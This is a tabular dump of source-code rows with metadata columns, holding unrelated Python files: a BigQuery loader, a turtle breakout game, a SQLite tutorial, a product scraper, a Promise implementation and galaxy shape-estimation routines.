blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 5
133
| path
stringlengths 2
333
| src_encoding
stringclasses 30
values | length_bytes
int64 18
5.47M
| score
float64 2.52
5.81
| int_score
int64 3
5
| detected_licenses
listlengths 0
67
| license_type
stringclasses 2
values | text
stringlengths 12
5.47M
| download_success
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|
3c362e6a9abc4726ac4753ecbcde76d8a0467565
|
Python
|
detianitatibs/getCryptocurrency
|
/loadCryptocurrecyGcsToBigQuery/main.py
|
UTF-8
| 1,994 | 2.515625 | 3 |
[] |
no_license
|
# -*- coding:utf-8 -*-
"""
StorageにたまったTSVファイルを日次でBigQueryにロードする(GCF版)
"""
__author__ = "@detian_itatbs"
__status__ = "development"
__version__ = "0.0.1"
__date__ = "16 January 2021"
import datetime
import os
from google.cloud import bigquery
def getNowDtStrAgo(isConvertJST=False):
"""
現時刻から1日前の文字列(%Y%m%d%H%M%S)を返す
第1引数:実施環境の時刻がUTCの場合はTrueにすることでJSTに変換する
"""
dt_now = datetime.datetime.now() - datetime.timedelta(days=1)
if isConvertJST :
dt_now = dt_now + datetime.timedelta(hours=9)
dt_str = dt_now.strftime('%Y%m%d%H%M%S')
return dt_str
def loadCryptocurrecyGcsToBigQuery(event, context):
bq = bigquery.Client()
dt_str = getNowDtStrAgo(True)
bucket = os.environ.get('BUCKET')
filename = os.environ.get('FILENAME')
project_id = os.environ.get('PROJECT_ID')
dataset = os.environ.get('DATASET')
table_name = os.environ.get('TABLE_NAME')
job_config = bigquery.LoadJobConfig(
schema=[
bigquery.SchemaField("timestamp", "DATETIME"),
bigquery.SchemaField("symbol", "STRING"),
bigquery.SchemaField("last", "FLOAT"),
bigquery.SchemaField("high", "FLOAT"),
bigquery.SchemaField("low", "FLOAT"),
bigquery.SchemaField("ask", "FLOAT"),
bigquery.SchemaField("bid", "FLOAT"),
bigquery.SchemaField("volume", "FLOAT"),
],
write_disposition=bigquery.WriteDisposition.WRITE_APPEND,
source_format=bigquery.SourceFormat.CSV,
field_delimiter='\t'
)
uri = 'gs://{0}/{1}/{2}/{3}/{4}_*'.format(bucket, dt_str[:4], dt_str[4:6], dt_str[6:8], filename)
table_id = '{0}.{1}.{2}${3}'.format(project_id, dataset, table_name, dt_str[:8])
load_job = bq.load_table_from_uri(
uri, table_id, job_config=job_config
) # Make an API request.
print("end")
| true |
c49b8c57b765585d198b31f13ce9f86de67a86a6
|
Python
|
Josh-Ay/breakout-game
|
/main.py
|
UTF-8
| 2,000 | 3.6875 | 4 |
[] |
no_license
|
from turtle import Screen
from ball import Ball
from paddle import Paddle
from block import Block
from scoreboard import Score
from random import choice
game_on = True
# Creating the screen
screen = Screen()
# Configuring the screen
screen.title("BreakOut Game")
screen.setup(700, 600)
screen.bgcolor("black")
screen.tracer(0)
# Creating instances of the ball, paddle and blocks
ball = Ball()
paddle = Paddle(0, -260)
score = Score()
score.display_score()
blocks = []
x_range = [x for x in range(-330, 330)]
y_range = [y for y in range(200, 260)]
for _ in range(10):
new_block = Block(choice(x_range), choice(y_range))
blocks.append(new_block)
# Tying events to the 'left' and 'right' keys
screen.onkey(paddle.move_left, "Left")
screen.onkey(paddle.move_right, "Right")
# Listening for the above events
screen.listen()
def play_game():
global game_on
if game_on:
screen.update() # update the screen
ball.move() # move the ball
# bounce off the wall
if ball.xcor() > 330 or ball.xcor() < -330:
ball.bounce_off_wall()
# bounce off the paddle
if paddle.distance(ball) <= 24.1421:
ball.bounce()
# bounce off top wall
if ball.ycor() > 280:
ball.bounce()
# detect collision between a block and destroy the destroy the corresponding block
for block in blocks:
if block.distance(ball) < 28.8:
score.add_to_score() # add one to current score
blocks.remove(block) # remove block from list
ball.bounce()
block.goto(1000, 1000) # bye-bye block
# GAME_OVER: CHECK IF THERE ARE NO BLOCKS LEFT OR IF THE PADDLE WENT OUT OF RANGE
if ball.ycor() < -280 or len(blocks) == 0:
game_on = False
score.update_high_score()
screen.ontimer(play_game, 1) # keep calling 'play_game' after 1 millisecond
play_game()
screen.mainloop()
| true |
7640bc5c7d0590d59eb3309183b673ad858ba0ac
|
Python
|
201411096/study_flask
|
/flask/ex_04_full-stack-basic/01_backend/01_decorator/02_First-class-function.py
|
UTF-8
| 781 | 4.15625 | 4 |
[] |
no_license
|
"""
First-class function
1. 함수를 식별자에 바인딩할 수 있는지
2. 함수를 데이터 구조에 저장할 수 있는지
3. 함수 호출에서 함수를 인수로 전달할 수 있는지
4. 함수 호출에서 함수를 반환할 수 있는지
"""
print('==============================')
def my_func(arg_num):
return arg_num *2
print(my_func(4))
tempFunc = my_func
print(tempFunc(4))
print('==============================')
def my_func_list(arg_list, arg_func):
for i in arg_list:
print(arg_func(i))
my_func_list([1,2,3,4,5], my_func)
print('==============================')
def myPrintFunc(arg_sender):
def inner_func(msg):
print(arg_sender + " : " + msg)
return inner_func
tempFunc2 = myPrintFunc('sender1')
tempFunc2('abc')
| true |
017309b7f3ceba4f2c8c252e988dc6845c1161c3
|
Python
|
ornellaolivastri/python_projects
|
/hello-world/hello_world.py
|
UTF-8
| 1,828 | 4.4375 | 4 |
[] |
no_license
|
print ("Hello, world!")
# asi se escriben los comentarios de una linea
"""
esto es un comentario
de multiples lineas
"""
"""
# variables
texto = "Esto es un texto guardado en la variable texto"
nombre = "mi nombre es ornella"
edad = 23
anio = 2021
print(texto)
print(f"{nombre} -y mi edad- {edad}") #edad puede traer problemas
# porque print a veces no funciona bien con numeros,
# entonces para parsear el tipo se escribiría
# { str(edad) }
print(nombre + " y mi edad es " + str(edad)) #para poder hacer esto, lo que concateno
# debe ser del mismo tipo de dato
# Ingresar datos por teclado -------------------------------
sitioweb = input("Cual es tu pagina web?: ")
print(f"{sitioweb}, oki gracias")
# Condiciones ---------------------------------------------
"""
"""
altura = int ( input("Cual es tu altura?: ") )
if altura >= 180:
print("Eres una persona alta!!")
else:
print("Eres una persona baja!!")
"""
"""
# Funciones -----------------------------------------------
variable_altura = int ( input("Cual es tu altura?: ") )
def mostrarAltura(altura):
resultado = ""
if altura >= 180:
resultado = "Eres una persona alta!!"
else:
resultado = "Eres una persona baja!!"
#es recomendable que todas las funciones tengan un return
return resultado
print (mostrarAltura(variable_altura))
"""
# Listas --------------------------------------------------------------------------------
personas = ["Victor", "Paco", "Pepe"]
print(personas)
print("la persona de la posicion 1 es: " + personas[1])
#este bucle for recorre la lista personas creando una variable persona por cada una
for persona in personas:
print("usuario: " + persona)
| true |
2ed5c80a96971e76bfd594921045f49819346c51
|
Python
|
chow1340/fleeting_interest
|
/chat/ChatService.py
|
UTF-8
| 1,745 | 2.625 | 3 |
[] |
no_license
|
from config.MongoConnectionConfig import MongoConnectionConfig
from bson import json_util, ObjectId
from bson.json_util import dumps
from datetime import timedelta
class ChatService():
__instance = None
@staticmethod
def getInstance():
""" Static access method. """
if ChatService.__instance == None:
ChatService()
return ChatService.__instance
def __init__(self):
""" Virtually private constructor. """
if ChatService.__instance != None:
raise Exception("This class is a singleton!")
else:
ChatService.__instance = self
self.mongoConnection = MongoConnectionConfig.getInstance()
self.mongo = self.mongoConnection.connect()
self.users = self.mongo.db.users
self.chat = self.mongo.db.chat
def getChat(self, chatId):
chat = self.chat.find_one({'_id': ObjectId(chatId)})
return chat
def updateLastMessage(self, chatId, message):
self.chat.find_one_and_update({'_id': ObjectId(chatId)}, \
{'$set': {'lastMessageSent' : message}})
def updateLastMessageDate(self, chatId, date):
self.chat.find_one_and_update({'_id': ObjectId(chatId)}, \
{'$set': {'lastMessageDate': date }}, upsert=True)
def updateTotalMessages(self, chatId):
self.chat.find_one_and_update({'_id': ObjectId(chatId)}, \
{'$inc': {'totalMessages':1}})
def setIsRead(self, chat, userId, isRead):
if chat['user1']['_id'] == userId:
user = "user1"
else:
user = "user2"
self.chat.find_one_and_update({'_id': chat['_id']}, \
{'$set': {user + '.hasRead' : isRead}})
return
| true |
953d5228a112b7c2031064ee7b24992879d163a1
|
Python
|
a1anwolker/bot
|
/natali37.py
|
UTF-8
| 1,580 | 2.640625 | 3 |
[] |
no_license
|
import requests
from bs4 import BeautifulSoup as BS
from tqdm import tqdm
req_link = requests.get('https://natali37.ru/catalog/products/label/1')
html = BS(req_link.content, 'lxml')
#get max_count of new-products on the site
counter = (html.select('div.products__right-counter.products__counter')[0]).get_text(strip=True)
#load page with max_count of products
req_link = requests.get('https://natali37.ru/catalog/products/label/1' + '?page=1&page_limit=' + [s for s in counter.split() if s.isdigit()][0])
html = BS(req_link.content, 'lxml')
catalog_wrapper = html.select('ul.products__list.list')[0]
catalog_list = catalog_wrapper.find_all('li', class_='product-card')
#list to store all data
products = []
for catalog in tqdm(catalog_list, desc='catalog_list'):
tag_a = catalog.select('a.product-card__name.link')[0]
link = 'https://natali37.ru' + tag_a['href']
price = [s for s in (catalog.select('div.product-card__price.price')[0]).get_text(strip=True).split() if s.isdigit()][0]
pictures = (catalog.select('a.swiper-container>div.swiper-wrapper')[0]).find_all('div', class_='swiper-slide')
pictures_list = []
for picture in pictures:
try:
pictures_list.append(((picture.find('img', class_='image'))['data-src']).replace('thumb.', ''))
except:
pictures_list.append(((picture.find('img', class_='image'))['src']).replace('thumb.', ''))
products.append([link, price, pictures_list])
for i in products:
print('link: ' + i[0])
print(' - price: ' + i[1])
print(' - images: ')
for j in i[2]:
print(' * ' + j)
| true |
cb1f676f8432faf6ee5a510fd49bd6dcb22dbdad
|
Python
|
animjain/PythonAdvancedTraining
|
/2019_Apr16/design_patterns/chainofactions_test.py
|
UTF-8
| 326 | 2.65625 | 3 |
[] |
no_license
|
from chain_of_actions import ChainOfActions
@ChainOfActions
def add_test(x, y):
return x + y
@ChainOfActions
def mul_test(x, y):
return x * y
@ChainOfActions
def sub_test(x, y):
return x - y
dataset = [(10, 20), (4.5, 6.7), ("55", 78), (None, False)]
ChainOfActions.add_data(dataset)
ChainOfActions.run()
| true |
fb2abffbf69d977ae12243f52db76dddf48499c1
|
Python
|
NovikovMA/python_training_mantis
|
/test/test_project_del.py
|
UTF-8
| 3,996 | 2.5625 | 3 |
[
"Apache-2.0"
] |
permissive
|
# -*- coding: utf-8 -*-
__author__ = 'M.Novikov'
from model.project import Project # Проекты Mantis
from random import randrange # Случайности
import random # Случайности
# Тест удаления проекта, проверка через пользователький интерфейс
def test_project_del_ui(app):
if app.project.count() == 0: # Проверка наличия хотя бы одного проекта в списке
app.project.create(Project(name="Test project",description="Description test project.")) # Добавление нового проекта
old_projects = app.project.get_project_list() # Список проектов до удалени
index = randrange(len(old_projects)) # Получение случайного порядкового номера
app.project.delete_by_index(index) # Удаление проекта
new_projects = app.project.get_project_list() # Список проектов после удаления
old_projects[index:index+1] = [] # Удаление проекта из списка
assert sorted(old_projects, key=Project.id_or_max) == sorted(new_projects, key=Project.id_or_max)
# Тест удаления проекта, проверка с использование базы данных
def test_project_del_db(app, orm):
if len(orm.get_project_list()) == 0: # Проверка наличия хотя бы одного проекта в списке
app.project.create(Project(name="Test project",description="Description test project.")) # Добавление нового проекта
old_projects = orm.get_project_list() # Список проектов до удалени
project = random.choice(old_projects) # Получение случайного порядкового номера
app.project.delete_by_id(project.id) # Удаление проекта
new_projects = orm.get_project_list() # Список проектов после удаления
old_projects.remove(project) # Удаление проекта из списка
assert sorted(old_projects, key=Project.id_or_max) == sorted(new_projects, key=Project.id_or_max)
# Тест удаленияпроекта через протокол SOAP
def test_project_del_soap(app):
if len(app.soap.get_project_list()) == 0: # Проверка наличия хотя бы одного проекта в списке
app.project.create(Project(name="Test project",description="Description test project.")) # Добавление нового проекта
old_projects = app.soap.get_project_list() # Список проектов до удалени
project = random.choice(old_projects) # Получение случайного порядкового номера
app.project.delete_by_id(project.id) # Удаление проекта
new_projects = app.soap.get_project_list() # Список проектов после удаления
old_projects.remove(project) # Удаление проекта из списка
assert sorted(old_projects, key=Project.id_or_max) == sorted(new_projects, key=Project.id_or_max)
| true |
bc62bd3f66f78580d3c9135d81b7a6c2060a43d4
|
Python
|
NirmalVatsyayan/python-revision
|
/language_programs/python_numpy/18_numpy_comparison.py
|
UTF-8
| 1,052 | 4.125 | 4 |
[] |
no_license
|
import numpy as np
a = np.array([3, 3, 1], float)
b = np.array([0, 3, 2], float)
if False:
'''
comparing 2 numpy arrays
'''
print(a>b)
print(a>=b)
print(a<b)
print(a<=b)
print(a==b)
print(a!=b)
if False:
'''
comparing numpy array with scalar
'''
print(a>2)
if False:
'''
The any and all operators can be used
to determine whether or not any or all
elements of a Boolean array are true:
'''
print(any(a))
print(all(a))
if False:
'''
logical operation in numpy
'''
a = np.array([1, 3, 0], float)
print(a>0)
print(a<3)
print(np.logical_and(a > 0, a < 3))
print(np.logical_not(a))
print(np.logical_or(a>0, a<3))
if False:
'''
The where function forms a new array from two
arrays of equivalent size using a Boolean filter
to choose between elements of the two.
Its basic syntax is where(boolarray, truearray, falsearray):
'''
a = np.array([1, 3, 0], float)
print(np.where(a != 0, 1 / a, a))
| true |
27784d0bd477add5ad530a344b39f4e2963ebf88
|
Python
|
TheLycaeum/letterinvasion
|
/letter_invader.py
|
UTF-8
| 1,773 | 3.28125 | 3 |
[] |
no_license
|
import curses
import string
import random
import time
def max_dimensions(window):
height, width = window.getmaxyx()
return height - 2, width - 1
def create_random_letter(width):
letter = random.choice(string.ascii_lowercase)
column = random.randrange(0, width)
return 0, column, letter
def move_invaders(invaders, height):
new = {}
for (row, column), char in invaders.items():
new_row = row + 1
if new_row > height:
new_row -= 1
new[(new_row, column)] = char
return new
def draw_invaders(invaders, window):
for (row, column), char in invaders.items():
if row > height or column > width:
continue
window.addch(row, column, char)
def kill_invader(invaders, q):
invaders = {key: value for key, value in invaders.items() if value is not q}
return invaders
def count_life(invaders, height):
life = 10
max_row = height - 1
for (row, column), char in invaders.items():
if max_row == row:
life -= 1
return life
def main(window):
curses.curs_set(0)
invaders = {}
global height, width
height, width = max_dimensions(window)
while True:
window.clear()
window.nodelay(True)
invader = create_random_letter(width)
invaders = move_invaders(invaders, height)
invaders[(invader[0], invader[1])] = invader[2]
q = window.getch()
if q != -1:
invaders = kill_invader(invaders, chr(q))
draw_invaders(invaders, window)
window.refresh()
kill_invader(invaders, q)
time.sleep(0.4)
window.refresh()
if count_life(invaders, height) == 0:
break
if __name__ == '__main__':
curses.wrapper(main)
| true |
7127833a9d19413f7f5f1c028d4a6fe3c823b990
|
Python
|
sublimelsp/LSP
|
/plugin/core/promise.py
|
UTF-8
| 7,637 | 3.203125 | 3 |
[
"MIT"
] |
permissive
|
from .typing import Callable, Generic, List, Optional, Protocol, Tuple, TypeVar, Union
import functools
import threading
T = TypeVar('T')
S = TypeVar('S')
TExecutor = TypeVar('TExecutor')
T_contra = TypeVar('T_contra', contravariant=True)
TResult = TypeVar('TResult')
class ResolveFunc(Protocol[T_contra]):
def __call__(self, resolve_value: T_contra) -> None:
...
FullfillFunc = Callable[[T], Union[TResult, 'Promise[TResult]']]
ExecutorFunc = Callable[[ResolveFunc[T]], None]
PackagedTask = Tuple['Promise[T]', ResolveFunc[T]]
class Promise(Generic[T]):
"""A simple implementation of the Promise specification.
See: https://promisesaplus.com
Promise is in essence a syntactic sugar for callbacks. Simplifies passing
values from functions that might do work in asynchronous manner.
Example usage:
* Passing return value of one function to another:
def do_work_async(resolve):
# "resolve" is a function that, when called with a value, resolves
# the promise with provided value and passes the value to the next
# chained promise.
resolve(111) # Can be invoked asynchronously.
def process_value(value):
assert value === 111
Promise(do_work_async).then(process_value)
* Returning Promise from chained promise:
def do_work_async_1(resolve):
# Compute value asynchronously.
resolve(111)
def do_work_async_2(resolve):
# Compute value asynchronously.
resolve(222)
def do_more_work_async(value):
# Do more work with the value asynchronously. For the sake of this
# example, we don't use 'value' for anything.
assert value === 111
return Promise(do_work_async_2)
def process_value(value):
assert value === 222
Promise(do_work_async_1).then(do_more_work_async).then(process_value)
"""
@staticmethod
def resolve(resolve_value: S) -> 'Promise[S]':
"""Immediately resolves a Promise.
Convenience function for creating a Promise that gets immediately
resolved with the specified value.
Arguments:
resolve_value: The value to resolve the promise with.
"""
def executor_func(resolve_fn: ResolveFunc[S]) -> None:
resolve_fn(resolve_value)
return Promise(executor_func)
@staticmethod
def packaged_task() -> PackagedTask[S]:
class Executor(Generic[TExecutor]):
__slots__ = ("resolver",)
def __init__(self) -> None:
self.resolver = None # type: Optional[ResolveFunc[TExecutor]]
def __call__(self, resolver: ResolveFunc[TExecutor]) -> None:
self.resolver = resolver
executor = Executor() # type: Executor[S]
promise = Promise(executor)
assert callable(executor.resolver)
return promise, executor.resolver
# Could also support passing plain S.
@staticmethod
def all(promises: List['Promise[S]']) -> 'Promise[List[S]]':
"""
Takes a list of promises and returns a Promise that gets resolved when all promises
gets resolved.
:param promises: The list of promises
:returns: A promise that gets resolved when all passed promises gets resolved.
Gets passed a list with all resolved values.
"""
def executor(resolve: ResolveFunc[List[S]]) -> None:
was_resolved = False
def recheck_resolve_status(_: S) -> None:
nonlocal was_resolved
# We're being called from a Promise that is holding a lock so don't try to use
# any methods that would try to acquire it.
if not was_resolved and all(p.resolved for p in promises):
was_resolved = True
values = [p.value for p in promises]
resolve(values)
for p in promises:
assert isinstance(p, Promise)
p.then(recheck_resolve_status)
if promises:
return Promise(executor)
return Promise.resolve([])
def __init__(self, executor_func: ExecutorFunc[T]) -> None:
"""Initialize Promise object.
Arguments:
executor_func: A function that is executed immediately by this Promise.
It gets passed a "resolve" function. The "resolve" function, when
called, resolves the Promise with the value passed to it.
"""
self.resolved = False
self.mutex = threading.Lock()
self.callbacks = [] # type: List[ResolveFunc[T]]
executor_func(lambda resolve_value=None: self._do_resolve(resolve_value))
def __repr__(self) -> str:
if self.resolved:
return 'Promise({})'.format(self.value)
return 'Promise(<pending>)'
def then(self, onfullfilled: FullfillFunc[T, TResult]) -> 'Promise[TResult]':
"""Create a new promise and chain it with this promise.
When this promise gets resolved, the callback will be called with the
value that this promise resolved with.
Returns a new promise that can be used to do further chaining.
Arguments:
onfullfilled: The callback to call when this promise gets resolved.
"""
def callback_wrapper(resolve_fn: ResolveFunc[TResult], resolve_value: T) -> None:
"""A wrapper called when this promise resolves.
Arguments:
resolve_fn: A resolve function of newly created promise.
resolve_value: The value with which this promise resolved.
"""
result = onfullfilled(resolve_value)
# If returned value is a promise then this promise needs to be
# resolved with the value of returned promise.
if isinstance(result, Promise):
result.then(lambda value: resolve_fn(value))
else:
resolve_fn(result)
def sync_wrapper(resolve_fn: ResolveFunc[TResult]) -> None:
"""Call resolve_fn immediately with the resolved value.
A wrapper function that will immediately resolve resolve_fn with the
resolved value of this promise.
"""
callback_wrapper(resolve_fn, self._get_value())
def async_wrapper(resolve_fn: ResolveFunc[TResult]) -> None:
"""Queue resolve_fn to be called after this promise resolves later.
A wrapper function that will resolve received resolve_fn when this promise
resolves later.
"""
self._add_callback(functools.partial(callback_wrapper, resolve_fn))
if self._is_resolved():
return Promise(sync_wrapper)
return Promise(async_wrapper)
def _do_resolve(self, new_value: T) -> None:
# No need to block as we can't change from resolved to unresolved.
if self.resolved:
raise RuntimeError("cannot set the value of an already resolved promise")
with self.mutex:
self.resolved = True
self.value = new_value
for callback in self.callbacks:
callback(new_value)
def _add_callback(self, callback: ResolveFunc[T]) -> None:
with self.mutex:
self.callbacks.append(callback)
def _is_resolved(self) -> bool:
with self.mutex:
return self.resolved
def _get_value(self) -> T:
with self.mutex:
return self.value
| true |
c696694d9532538bba60aa872da6e39709200409
|
Python
|
jgingh7/Problem-Solving-Python
|
/FindTheWinnerOfAnArrayGame.py
|
UTF-8
| 656 | 3.59375 | 4 |
[] |
no_license
|
# https://leetcode.com/problems/find-the-winner-of-an-array-game/
# Time: O(n)
# Time: O(1)
class Solution:
def getWinner(self, arr: List[int], k: int) -> int:
currWinner = arr[0]
currK = k
for i in range(1, len(arr)):
if currWinner > arr[i]:
currK -= 1
else:
currWinner = arr[i]
currK = k - 1
if currK == 0:
return currWinner
return currWinner # if iteration goes until len(arr) times, falls into infinite loop
# because the maximum number is on the most left
| true |
849a86780d72e5cd5dde8ee9023bb7ab6ae498fe
|
Python
|
JacobGT/SQLite3PythonTutorial
|
/formatResults.py
|
UTF-8
| 560 | 3.84375 | 4 |
[] |
no_license
|
import sqlite3
# Connect to database
conn = sqlite3.connect("customers.db")
# Create a cursor
c = conn.cursor()
# Query the database (db)
c.execute("SELECT * FROM customers")
# The fetch command brings out the results as a tuple inside a python list, so you can access it like that ex. ()[#]
items = c.fetchall()
# Formatting the results
for item in items:
print("Name: " + item[0] + "\tLast Name: " + item[1] + "\tEmail: " + item[2])
# We also can just do: print(item)
# Commit changes to db
conn.commit()
# Close connection to db
conn.close()
| true |
5736caf9ab2f502796d43e7d0e6d33377dba8a0a
|
Python
|
sfarrens/sf_tools
|
/sf_tools/image/shape.py
|
UTF-8
| 12,027 | 3.3125 | 3 |
[
"MIT"
] |
permissive
|
# -*- coding: utf-8 -*-
"""SHAPE ESTIMATION ROUTINES
This module contains methods and classes for estimating galaxy shapes.
:Author: Samuel Farrens <samuel.farrens@gmail.com>
:Version: 1.4
:Date: 20/10/2017
Notes
-----
Some of the methods in this module are based on work by Fred Ngole.
"""
from __future__ import division
import numpy as np
def ellipticity_atoms(data, offset=0):
r"""Calculate ellipticity
This method calculates the ellipticity of an image from its shape
projection components.
Parameters
----------
data : numpy.ndarray
Input data array, the image to be analysed
offset : int, optional
Shape projection offset (default is '0')
Returns
-------
numpy.ndarray
Image ellipticity components
See Also
--------
shape_project : shape projection matrix
Notes
-----
This technique was developed by Fred Ngole and implements the following
equations:
- Equations C.1 and C.2 from [NS2016]_ appendix:
.. math::
e_1(\mathbf{X}_i) = \frac{<\mathbf{X}_i, \mathbf{U}_4>
<\mathbf{X}_i, \mathbf{U}_2> -
<\mathbf{X}_i, \mathbf{U}_0>^2 +
<\mathbf{X}_i, \mathbf{U}_1>^2}
{<\mathbf{X}_i, \mathbf{U}_3>
<\mathbf{X}_i, \mathbf{U}_2> -
<\mathbf{X}_i, \mathbf{U}_0>^2 -
<\mathbf{X}_i, \mathbf{U}_1>^2
}
e_2(\mathbf{X}_i) = \frac{2\left(<\mathbf{X}_i, \mathbf{U}_5>
<\mathbf{X}_i, \mathbf{U}_2> -
<\mathbf{X}_i, \mathbf{U}_0>
<\mathbf{X}_i, \mathbf{U}_1>\right)}
{<\mathbf{X}_i, \mathbf{U}_3>
<\mathbf{X}_i, \mathbf{U}_2> -
<\mathbf{X}_i, \mathbf{U}_0>^2 -
<\mathbf{X}_i, \mathbf{U}_1>^2
}
Examples
--------
>>> from image.shape import ellipticity_atoms
>>> import numpy as np
>>> a = np.zeros((5, 5))
>>> a[2, 1:4] += 1
>>> ellipticity_atoms(a)
array([-1., 0.])
>>> b = np.zeros((5, 5))
>>> b[1:4, 2] += 1
>>> ellipticity_atoms(b)
array([ 1., 0.])
"""
XU = [np.sum(data * U) for U in shape_project(data.shape, offset)]
divisor = XU[3] * XU[2] - XU[0] ** 2 - XU[1] ** 2
e1 = (XU[4] * XU[2] - XU[0] ** 2 + XU[1] ** 2) / divisor
e2 = 2 * (XU[5] * XU[2] - XU[0] * XU[1]) / divisor
return np.array([e1, e2])
def shape_project(shape, offset=0, return_norm=False):
r"""Shape projection matrix
This method generates a shape projection matrix for a given image.
Parameters
----------
shape : list, tuple or numpy.ndarray
List of image dimensions
offset : int, optional
Shape projection offset (default is '0')
return_norm : bool, optional
Option to return l2 normalised shape projection components
(default is 'False')
Returns
-------
numpy.ndarray
Shape projection components
See Also
--------
ellipticity_atoms : calculate ellipticity
Notes
-----
This technique was developed by Fred Ngole and implements the following
equations:
- Equations from [NS2016]_ appendix:
.. math::
U_1 &= (k)_{1 \leq k \leq N_l, 1 \leq l \leq N_c} \\
U_2 &= (l)_{1 \leq k \leq N_l, 1 \leq l \leq N_c} \\
U_3 &= (1)_{1 \leq k \leq N_l, 1 \leq l \leq N_c} \\
U_4 &= (k^2 + l^2)_{1 \leq k \leq N_l, 1 \leq l \leq N_c} \\
U_5 &= (k^2 - l^2)_{1 \leq k \leq N_l, 1 \leq l \leq N_c} \\
U_6 &= (kl)_{1 \leq k \leq N_l, 1 \leq l \leq N_c}
Examples
--------
>>> from image.shape import shape_project
>>> shape_project([3, 3])
array([[[ 0., 0., 0.],
[ 1., 1., 1.],
[ 2., 2., 2.]],
<BLANKLINE>
[[ 0., 1., 2.],
[ 0., 1., 2.],
[ 0., 1., 2.]],
<BLANKLINE>
[[ 1., 1., 1.],
[ 1., 1., 1.],
[ 1., 1., 1.]],
<BLANKLINE>
[[ 0., 1., 4.],
[ 1., 2., 5.],
[ 4., 5., 8.]],
<BLANKLINE>
[[ 0., -1., -4.],
[ 1., 0., -3.],
[ 4., 3., 0.]],
<BLANKLINE>
[[ 0., 0., 0.],
[ 0., 1., 2.],
[ 0., 2., 4.]]])
"""
U = []
U.append(np.outer(np.arange(shape[0]) + offset, np.ones(shape[1])))
U.append(np.outer(np.ones(shape[0]), np.arange(shape[1]) + offset))
U.append(np.ones(shape))
U.append(U[0] ** 2 + U[1] ** 2)
U.append(U[0] ** 2 - U[1] ** 2)
U.append(U[0] * U[1])
if return_norm:
np.array([np.linalg.norm(x, 2) for x in U])
else:
return np.array(U)
class Ellipticity():
""" Image ellipticity class
This class calculates image ellipticities from quadrupole moments.
Parameters
----------
data : numpy.ndarray
Input data array, the image to be analysed
sigma : int, optional
Estimation error (default is '1000')
centroid : numpy.ndarray, optional
Centroid positions [x, y] of the input image (defualt is 'None')
moments : numpy.ndarray, optional
Quadrupole moments [[q00, q01], [q10, q11]] of the input image
(defualt is 'None')
ellip_type : {'chi', 'epsilon'}, optional
Ellipticity type (default is 'chi')
Examples
--------
>>> from image.shape import Ellipticity
>>> import numpy as np
>>> a = np.zeros((5, 5))
>>> a[2, 1:4] += 1
>>> Ellipticity(a).e
array([-1., 0.])
>>> b = np.zeros((5, 5))
>>> b[1:4, 2] += 1
>>> Ellipticity(b).e
array([ 1., 0.])
"""
def __init__(self, data, sigma=1000, centroid=None, moments=None,
ellip_type='chi'):
self._data = data
self._sigma = sigma
self._ranges = np.array([np.arange(i) for i in data.shape])
self._ellip_type = ellip_type
self._check_ellip_type()
if not isinstance(moments, type(None)):
self.moments = np.array(moments).astype('complex').reshape(2, 2)
self._get_ellipse()
elif isinstance(centroid, type(None)):
self._get_centroid()
else:
self.centroid = centroid
self._update_weights()
self._get_moments()
def _check_ellip_type(self):
"""Check Ellipticity Type
This method raises an error if ellip_type is not 'chi' or 'epsilon'.
Raises
------
ValueError for invalid ellip_type
"""
if self._ellip_type not in ('chi', 'epsilon'):
raise ValueError('Invalid ellip_type, options are "chi" or '
'"epsilon"')
def _update_xy(self):
"""Update the x and y values
This method updates the values of x and y using the current centroid.
"""
self._x = np.outer(self._ranges[0] - self.centroid[0],
np.ones(self._data.shape[1]))
self._y = np.outer(np.ones(self._data.shape[0]),
self._ranges[1] - self.centroid[1])
def _update_weights(self):
"""Update the weights
This method updates the value of the weights using the current values
of x and y.
Notes
-----
This method implements the following equations:
- The exponential part of equation 1 from [BM2007]_ to calculate
the weights:
.. math::
w(x,y) = e^{-\\frac{\\left((x-x_c)^2+(y-y_c)^2\\right)}
{2\\sigma^2}}
"""
self._update_xy()
self._weights = np.exp(-(self._x ** 2 + self._y ** 2) /
(2 * self._sigma ** 2))
def _update_centroid(self):
r"""Update the centroid
This method updates the centroid value using the current weights.
Notes
-----
This method implements the following equations:
- Equation 2a, 2b and 2c from [BM2007]_ to calculate the position
moments:
.. math::
S_w = \sum_{x,y} I(x,y)w(x,y)
S_x = \sum_{x,y} xI(x,y)w(x,y)
S_y = \sum_{x,y} yI(x,y)w(x,y)
- Equation 3 from [BM2007]_ to calculate the centroid:
.. math::
X_c = S_x/S_w,\\
Y_c = S_y/S_w
"""
# Calculate the position moments.
iw = np.array([np.sum(self._data * self._weights, axis=i)
for i in (1, 0)])
sw = np.sum(iw, axis=1)
sxy = np.sum(iw * self._ranges, axis=1)
# Update the centroid value.
self.centroid = sxy / sw
def _get_centroid(self, n_iter=10):
"""Calculate centroid
This method iteratively calculates the centroid of the image.
Parameters
----------
n_iter : int, optional
Number of iterations (deafult is '10')
"""
# Set initial value for the weights.
self._weights = np.ones(self._data.shape)
# Iteratively calculate the centroid.
for i in range(n_iter):
# Update the centroid value.
self._update_centroid()
# Update the weights.
self._update_weights()
# Calculate the quadrupole moments.
self._get_moments()
def _get_moments(self):
r""" Calculate the quadrupole moments
This method calculates the quadrupole moments.
Notes
-----
This method implements the following equations:
- Equation 10 from [C2013]_ to calculate the moments:
.. math::
Q_{ij}=\\frac{\\int\\int\\Phi(x_i,x_j) w(x_i,x_j)
(x_i-\\bar{x_i})(x_j-\\bar{x_j}) dx_idx_j}
{\\int\\int\\Phi(x_i,x_j)w(x_i,x_j)dx_idx_j}
"""
# Calculate moments.
q = np.array([np.sum(self._data * self._weights * xi * xj) for xi in
(self._x, self._y) for xj in (self._x, self._y)])
self.moments = (q / np.sum(self._data *
self._weights)).reshape(2, 2).astype('complex')
# Calculate the ellipticities.
self._get_ellipse()
def _get_ellipse(self):
r"""Calculate the ellipticities
This method cacluates ellipticities from quadrupole moments.
Notes
-----
This method implements the following equations:
- Equation 11 from [C2013]_ to calculate the size:
.. math:: R^2 = Q_{00} + Q_{11}
- Equation 7 from [S2005]_ to calculate the ellipticities:
.. math::
\\chi = \\frac{Q_{00}-Q_{11}+iQ_{01}+iQ_{10}}{R^2}
\\epsilon = \\frac{Q_{00}-Q_{11}+iQ_{01}+iQ_{10}}{R^2 +
2\\sqrt{(Q_{00}Q_{11} - Q_{01}Q_{10})}}
"""
# Calculate the size.
self.r2 = self.moments[0, 0] + self.moments[1, 1]
